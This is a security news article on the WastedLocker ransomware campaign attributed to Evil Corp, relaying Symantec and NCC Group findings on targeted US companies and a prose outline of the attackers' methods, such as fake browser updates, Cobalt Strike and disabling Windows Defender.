More than two-dozen US organizations — several of them Fortune 500 companies — were attacked in recent days by a known threat group looking to deploy a dangerous new strain of ransomware called WastedLocker.
Had the attacks succeeded, they could have resulted in millions of dollars in damages to the organizations and potentially had a major impact on supply chains in the US, Symantec said in a report Thursday.
According to the security vendor, at least 31 of its customers were targeted, suggesting the actual scope of the attacks is much higher. Eleven of the companies are publicly listed, and eight are in the Fortune 500.
Among those affected were five organizations in the manufacturing sector, four IT companies, and three media and telecommunications firms. Organizations in multiple other sectors — including energy, transportation, financial services, and healthcare — were also affected. In each instance, the attackers managed to breach the networks of the targeted organizations and were preparing to deploy the ransomware when they were detected and stopped.
"The attackers behind this threat appear to be skilled and experienced, capable of penetrating some of the most well protected corporations, stealing credentials, and moving with ease across their networks," Symantec warned. "As such, WastedLocker is a highly dangerous piece of ransomware."
Symantec described the attacks as being carried out by Evil Corp., a Russian cybercrime group that has been previously associated with the Dridex banking Trojan and the BitPayment ransomware family. Last December, US authorities indicted two members associated with the group — Maksim Yakubets and Igor Turashev — in connection with their operation of Dridex and the Zeus banking Trojans.
The two — along with other conspirators — are alleged to have attempted theft of a staggering $220 million and caused $70 million in actual damages. The US Department of State's Transnational Organized Crime (TOC) Rewards Program has established an unprecedented $5 million bounty for information on Yakubets. Both men remain at large.
The NCC Group, which also this week published a report on the WastedLocker campaign, said its investigations showed the ransomware has been in use at least since May and was likely in development several months before that. Evil Corp. has typically targeted file servers, database services, virtual machines, and cloud environments in its ransomware campaigns. They have also shown a tendency to disrupt or disable backup systems and related infrastructure where possible to make recovery even harder for victims, NCC Group said.
The malware masquerades as a browser update and lays the groundwork for the computer to be profiled. The attackers have then been using PowerShell to download and execute a loader for Cobalt Strike Beacon, a penetration-testing tool that attackers often use in malicious campaigns.
The tool is being used to execute commands, inject malicious code into processes or to impersonate them, download files, and carry out other various tasks that allow the attackers to escalate privileges and gain control of the infected system. As with many current malicious campaigns, the attackers behind WastedLocker have been leveraging legitimate processes and functions, including PowerShell scripts and the Windows Management Instrumentation Command Line Utility (wmic dot exe) in their campaign, Symantec said.
To deploy the ransomware itself, the attackers have been using the Windows Sysinternals tool PsExec to launch a legitimate command line tool for managing Windows Defender (mpcmdrun.exe). This disables scanning of all downloaded files and attachments and disables real-time monitoring, Symantec said. "It is possible that the attackers use more than one technique to perform this task, since NCC reported suspected use of a tool called SecTool checker for this purpose," Symantec said.
The ransomware deploys after Windows Defender and all associated services have been stopped across the organization, the vendor noted. "A successful attack could cripple the victim's network, leading to significant disruption to their operations and a costly clean-up operation," Symantec warned.